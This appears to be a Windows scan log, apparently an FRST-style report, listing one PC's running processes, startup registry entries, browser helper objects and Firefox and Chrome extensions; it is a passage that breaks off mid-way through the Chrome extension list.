C:\Program Files (x86)\The Bat!\thebat.exe (Alienware Corp) C:\Program Files\Alienware\Command Center\AWCCServiceController.exe (Akamai Technologies, Inc.) C:\Users\Jack\AppData\Local\Akamai\netsession_win.exe (SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIHSA.EXE (Akamai Technologies, Inc.) C:\Users\Jack\AppData\Local\Akamai\netsession_win.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe ( Inc.) C:\Program Files\Alienware\Alienware TactX Mouse CI\AWMouseCI.exe (Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.exe (Logitech, Inc.) C:\Program Files\Logitech\SetPoint\SetPoint.exe () C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe (NEC Electronics Corporation) C:\Program Files (x86)\NEC Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe (TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe (SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe (United Parcel Service, Inc.) C:\UPS\WSTD\WSTDMessaging.exe (Cyber Power Systems, Inc.) C:\Program Files (x86)\CyberPower PowerPanel Personal Edition\pppeuser.exe (GP Software) C:\Program Files\GPSoftware\Directory Opus\dopus.exe (Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe (Acronis) C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe (SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe (SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe (ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe (ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ArcCon.ac (TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\TscHelp.exe (Alienware Corporation) C:\Program Files\Alienware\Command Center\AlienwareAlienFXController.exe (TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\SnagPriv.exe (Alienware Corp.) C:\Program Files\Alienware\Command Center\ThermalController.exe () C:\Program Files\Logitech\SetPoint\x86\SetPoint32.exe (Alienware) C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher32.exe (Alienware) C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher32.exe (Alienware) C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher64.exe (Alienware) C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher64.exe () C:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe (Alienware) C:\Program Files\Alienware\Command Center\AlienFusionService.exe (Condusiv Technologies) C:\Program Files\Condusiv Technologies\Diskeeper\DkService.exe () C:\Program Files\Alienware\Command Center\AlienFusionController.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe (Acronis) C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe (Acronis) C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_189.exe (Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_189.exe (Don HO don.h@free.fr) C:\Program Files (x86)\Notepad++\notepad++.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10038304 2010-02-02] (Realtek Semiconductor) HKLM\...\Run: [Launch Keyboard CI] => c:\Program Files\Alienware\Alienware TactX Keyboard CI\txkbci.exe [3438088 2009-05-28] (Alienware) HKLM\...\Run: [] => [X] HKLM\...\Run: [Command Center Controllers] => C:\Program Files\Alienware\Command Center\AWCCStartupOrchestrator.exe [13256 2010-11-05] (Microsoft) HKLM\...\Run: [RunDLLEntry_THXCfg] => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64 HKLM\...\Run: [RunDLLEntry_EptMon] => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\EptMon64.dll,RunDLLEntry EptMon64 HKLM\...\Run: [Kernel and Hardware Abstraction Layer] => C:\Windows\KHALMNPR.EXE [130576 2009-06-17] (Logitech, Inc.) HKLM\...\Run: [Acronis Scheduler2 Service] => C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [516928 2013-02-15] (Acronis) HKLM-x32\...\Run: [iAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-03-03] (Intel Corporation) HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [336384 2011-04-19] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio PC\THXAudioCP\THXAudio.exe [963584 2009-12-01] (Creative Technology Ltd) HKLM-x32\...\Run: [updReg] => C:\Windows\UpdReg.EXE [90112 2000-05-11] (Creative Technology Ltd.) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [RoxWatchTray] => C:\Program Files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe [240112 2010-09-04] (Sonic Solutions) HKLM-x32\...\Run: [Desktop Disc Tool] => C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe [518640 2010-09-03] () HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\NEC Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [113296 2010-03-30] (NEC Electronics Corporation) HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [979328 2010-10-12] (SEIKO EPSON CORPORATION) HKLM-x32\...\Run: [ZoneAlarm] => C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe [137352 2014-04-25] (Check Point Software Technologies Ltd.) HKLM-x32\...\Run: [PowerPanel Personal Edition User Interaction] => C:\Program Files (x86)\CyberPower PowerPanel Personal Edition\pppeuser.exe [315392 2009-05-27] (Cyber Power Systems, Inc.) HKLM-x32\...\Run: [TrueImageMonitor.exe] => C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [6365920 2013-03-27] (Acronis) HKLM-x32\...\Run: [AcronisTibMounterMonitor] => C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe [1103424 2013-01-10] (Acronis) HKLM-x32\...\Run: [ATICustomerCare] => C:\Program Files (x86)\ATI\ATICustomerCare\ATICustomerCare.exe [311296 2010-03-04] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM-x32\...\Run: [avast] => C:\Program Files\AVAST Software\Avast\avastUI.exe [4858968 2013-08-30] (AVAST Software) HKLM-x32\...\Run: [FUFAXRCV] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe [495616 2011-03-09] (SEIKO EPSON CORPORATION) HKLM-x32\...\Run: [FUFAXSTM] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe [856064 2011-03-09] (SEIKO EPSON CORPORATION) HKLM-x32\...\Run: [ArcSoft Connection Service] => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe [207424 2010-10-27] (ArcSoft Inc.) HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation) HKLM-x32\...\RunOnce: [Launcher] => C:\Program Files (x86)\AlienRespawn\Components\Scheduler\Launcher.exe [165184 2011-01-13] (Softthinks) Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist\615\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.) Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.) HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKU\S-1-5-21-3994650508-1294297652-2827424591-1000\...\Run: [Directory Opus Desktop Dblclk] => C:\Program Files\GPSoftware\Directory Opus\dopusrt.exe [414848 2014-09-16] (GP Software) HKU\S-1-5-21-3994650508-1294297652-2827424591-1000\...\Run: [Quicknote] => C:\Program Files (x86)\Quicknote\quicknote.exe [1253376 2010-02-23] (JC&MB) HKU\S-1-5-21-3994650508-1294297652-2827424591-1000\...\Run: [Google Update] => C:\Users\Jack\AppData\Local\Google\Update\GoogleUpdate.exe [107912 2014-10-21] (Google Inc.) HKU\S-1-5-21-3994650508-1294297652-2827424591-1000\...\Run: [thebat_startup] => C:\Program Files (x86)\The Bat!\thebat.exe [13807536 2011-03-29] (Ritlabs S.R.L.) HKU\S-1-5-21-3994650508-1294297652-2827424591-1000\...\Run: [EPSON Artisan 800 Series] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIEMA.EXE [221696 2008-04-06] (SEIKO EPSON CORPORATION) HKU\S-1-5-21-3994650508-1294297652-2827424591-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Jack\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.) HKU\S-1-5-21-3994650508-1294297652-2827424591-1000\...\Run: [EPLTarget\P0000000000000001] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATIHSA.EXE [241280 2013-10-18] (SEIKO EPSON CORPORATION) HKU\S-1-5-21-3994650508-1294297652-2827424591-1000\...\MountPoints2: {ef812a05-556b-11e0-9e63-806e6f6e6963} - D:\EPSETUP.EXE Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk ShortcutTarget: Adobe Gamma Loader.lnk -> C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AWMouseCI.lnk ShortcutTarget: AWMouseCI.lnk -> C:\Program Files\Alienware\Alienware TactX Mouse CI\AWMouseCI.exe ( Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Logitech SetPoint.lnk ShortcutTarget: Logitech SetPoint.lnk -> C:\Program Files\Logitech\SetPoint\SetPoint.exe (Logitech, Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snagit 11.lnk ShortcutTarget: Snagit 11.lnk -> C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe (TechSmith Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UPS WorldShip Messaging Utility.lnk ShortcutTarget: UPS WorldShip Messaging Utility.lnk -> C:\UPS\WSTD\WSTDMessaging.exe (United Parcel Service, Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UPS WorldShip PLD Reminder Utility.lnk ShortcutTarget: UPS WorldShip PLD Reminder Utility.lnk -> C:\UPS\WSTD\wstdPldReminder.exe (UPS) Startup: C:\Users\Jack\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory Opus (Startup).lnk ShortcutTarget: Directory Opus (Startup).lnk -> C:\Program Files\GPSoftware\Directory Opus\dopus.exe (GP Software) ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software) ShellIconOverlayIdentifiers: [AcronisSyncError] -> {934BC6C0-FEC2-4df5-A100-961DE2C8A0ED} => C:\Program Files (x86)\Acronis\TrueImageHome\tishell64.dll (Acronis) ShellIconOverlayIdentifiers: [AcronisSyncInProgress] -> {00F848DC-B1D4-4892-9C25-CAADC86A215D} => C:\Program Files (x86)\Acronis\TrueImageHome\tishell64.dll (Acronis) ShellIconOverlayIdentifiers: [AcronisSyncOk] -> {71573297-552E-46fc-BE3D-3DFAF88D47B7} => C:\Program Files (x86)\Acronis\TrueImageHome\tishell64.dll (Acronis) BootExecute: autocheck autochk * autocheck auto_reactivate \\?\Volume{74c03d16-3481-11e0-8680-806e6f6e6963}\bootwiz\asrm.bin ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/ HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.alienware.com/ HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://support.alienware.com URLSearchHook: HKCU - (No Name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No File SearchScopes: HKCU - {130FE445-17ED-4FEC-B80A-9807F259FEA5} URL = http://search.yahoo.com/search?p={searchterms}&ei=UTF-8&fr=w3i&type=W3i_DS,136,0_0,Search,20130102,6901,0,8,0 BHO: StresStimulus Recorder Helper -> {0086E310-3FB9-45C5-A748-67F29F38D7E4} -> C:\Program Files (x86)\Fiddler2\Scripts\SSRecorderHelper.dll (Stimulus Technology) BHO: SnagIt Toolbar Loader -> {00C6482D-C502-44C8-8409-FCE54AD9C208} -> C:\Program Files (x86)\TechSmith\Snagit 10\DLLx64\SnagitBHO64.dll (TechSmith Corporation) BHO: avast! Online Security -> {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.) BHO-x32: SnagIt Toolbar Loader -> {00C6482D-C502-44C8-8409-FCE54AD9C208} -> C:\Program Files (x86)\TechSmith\Snagit 10\SnagitBHO.dll (TechSmith Corporation) BHO-x32: IEPlugin Class -> {11222041-111B-46E3-BD29-EFB2449479B1} -> C:\Program Files (x86)\ArcSoft\Video Downloader\ArcURLRecord.dll (ArcSoft, Inc.) BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) BHO-x32: ToolbarBHO Class -> {9519AF7E-638D-4933-BAD6-D33D23C79FE5} -> C:\Program Files (x86)\ArcSoft\RAW Thumbnail Viewer\EXIFToolBar.dll (ArcSoft Inc.) BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software) Toolbar: HKLM - Snagit - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files (x86)\TechSmith\Snagit 10\DLLx64\SnagitIEAddin64.dll (TechSmith Corporation) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) Toolbar: HKLM-x32 - avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) Toolbar: HKLM-x32 - Snagit - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files (x86)\TechSmith\Snagit 10\SnagitIEAddin.dll (TechSmith Corporation) Toolbar: HKLM-x32 - ZoneAlarm Security Toolbar - {438FAE3E-BDEF-44D3-AB8B-0C7C8350DF59} - C:\Program Files (x86)\Check Point Software Technologies LTD\zonealarm\1.6.7.4\zonealarmTlbr.dll (Montera Technologeis LTD) Toolbar: HKLM-x32 - RAW Thumbnail Viewer - {F301665A-12F8-4331-804A-5BCBD379668C} - C:\Program Files (x86)\ArcSoft\RAW Thumbnail Viewer\EXIFToolBar.dll (ArcSoft Inc.) Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) Toolbar: HKCU - No Name - {8FF5E180-ABDE-46EB-B09E-D2AAB95CABE3} - No File Toolbar: HKCU - No Name - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} - No File DPF: HKLM-x32 {74F4F118-91E6-4AFC-B8D2-04066781F239} https://www.member-data.com/rdc/EZTwainX.cab Handler: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - No File Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: http\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: https\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) ShellExecuteHooks: Directory Opus Shell Execute Hook - {3CF9ECE0-1A9F-11D2-8C73-00C06C2005DE} - C:\Program Files\GPSoftware\Directory Opus\dopuslib.dll [1573504 2014-09-16] (GP Software) ShellExecuteHooks-x32: Directory Opus Shell Execute Hook - {EE761688-C137-4b04-8FAB-3C9CDF0886F0} - C:\Program Files\GPSoftware\Directory Opus\dopuslib32.dll [343640 2014-09-16] (GP Software) Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62 FireFox: ======== FF ProfilePath: C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417 FF Homepage: localsites/ FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_189.dll () FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.) FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_189.dll () FF Plugin-x32: @checkpoint.com/FFApi -> C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker\bin\npFFApi.dll No File FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google) FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @nullsoft.com/winampDetector;version=1 -> C:\Program Files (x86)\Winamp Detect\npwachk.dll (Nullsoft, Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Jack\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Jack\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.) FF Extension: SeoQuake - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{317B5128-0B0B-49b2-B2DB-1E7560E16C74} [2014-09-05] FF Extension: ColorZilla - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{6AC85730-7D0F-4de0-B3FA-21142DD85326} [2013-08-10] FF Extension: ReminderFox - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{ada4b710-8346-4b82-8199-5de2b400a6ae} [2014-04-21] FF Extension: Cookies Manager+ - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{bb6bc1bb-f824-4702-90cd-35e2fb24f25d} [2013-11-18] FF Extension: Firebug - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\firebug@software.joehewitt.com.xpi [2013-09-06] FF Extension: YouTube Enhancer Plus - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\firefoxaddon@youtubeenhancer.com.xpi [2013-08-23] FF Extension: Foxy SEO Tool - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\foxyseotool@foxyseotool.com.xpi [2013-10-16] FF Extension: Leading-SEO - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\jid0-nWM1zRUDcqM8sPZ4tmz40Nce7jE@jetpack.xpi [2013-10-16] FF Extension: Flash OnOff - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\jid0-XXocAsQYPfKHSY8ebTi0VcX8eNQ@jetpack.xpi [2013-08-04] FF Extension: User Agent Overrider - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\useragentoverrider@qixinglu.com.xpi [2013-10-16] FF Extension: Remove Cookies for Site - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea}.xpi [2014-03-16] FF Extension: MeasureIt - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{75CEEE46-9B64-46f8-94BF-54012DE155F0}.xpi [2013-10-30] FF Extension: SEO and Website Analysis - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{8BCA0E8A-E57B-425b-A05B-CD3868EB577E}.xpi [2013-10-16] FF Extension: Show my Password - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{cd617372-6743-4ee4-bac4-fbf60f35719e}.xpi [2013-10-16] FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2013-04-18] FF HKLM-x32\...\Firefox\Extensions: [fiddlerhook@fiddler2.com] - C:\Program Files (x86)\Fiddler2\FiddlerHook FF Extension: FiddlerHook - C:\Program Files (x86)\Fiddler2\FiddlerHook [2013-02-27] FF HKLM-x32\...\Firefox\Extensions: [{FFB96CC1-7EB3-449D-B827-DB661701C6BB}] - C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker FF HKLM-x32\...\Firefox\Extensions: [RAWThumbnailViewer@arcsoft.com.cn] - C:\Program Files (x86)\ArcSoft\RAW Thumbnail Viewer\FireFox Extension FF Extension: RAW Thumbnail Viewer - C:\Program Files (x86)\ArcSoft\RAW Thumbnail Viewer\FireFox Extension [2014-03-04] FF HKLM-x32\...\Firefox\Extensions: [{B728AB94-9BC7-49b7-B76A-422BB31B2FD0}] - C:\Program Files (x86)\ArcSoft\Video Downloader\Plugin_FireFox FF Extension: ArcSoft Video Downloader Extension - C:\Program Files (x86)\ArcSoft\Video Downloader\Plugin_FireFox [2014-03-04] Chrome: ======= CHR HomePage: Default -> hxxp://www.google.com/ CHR StartupUrls: Default -> "hxxp://www.google.com/" CHR Plugin: (Remoting Viewer) - internal-remoting-viewer CHR Plugin: (Native Client) - C:\Users\Jack\AppData\Local\Google\Chrome\Application\38.0.2125.104\ppGoogleNaClPluginChrome.dll No File CHR Plugin: (Chrome PDF Viewer) - C:\Users\Jack\AppData\Local\Google\Chrome\Application\38.0.2125.104\pdf.dll () CHR Plugin: (Shockwave Flash) - C:\Users\Jack\AppData\Local\Google\Chrome\Application\38.0.2125.104\gcswf32.dll No File CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_2_202_235.dll No File CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll No File CHR Plugin: (Java Deployment Toolkit 6.0.290.11) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll No File CHR Plugin: (Java Platform SE 6 U29) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll No File CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google) CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.111\npGoogleUpdate3.dll No File CHR Profile: C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-21] CHR Extension: (SEOrch - OnPage SEO Tool) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\dofplnfijbongplmhcpoobljlfjeaank [2013-08-06] CHR Extension: (SEO SERP Workbench) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehbgolklgacemnfnmkkpgekngaaggjjl [2013-07-24] CHR Extension: (avast! Online Security) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2013-09-23] CHR Extension: (Seo Serp Manager) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\jncpgpllflmbaaofhdmfamncdipmedjo [2013-09-03] CHR Extension: (Tag Assistant (by Google)) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\kejbdjndbnbjgmefkgdddjlbokphdefk [2013-07-21] CHR Extension: (WebRank SEO) - C:\Users\Jack\AppData\Local\Google\Chrome\User 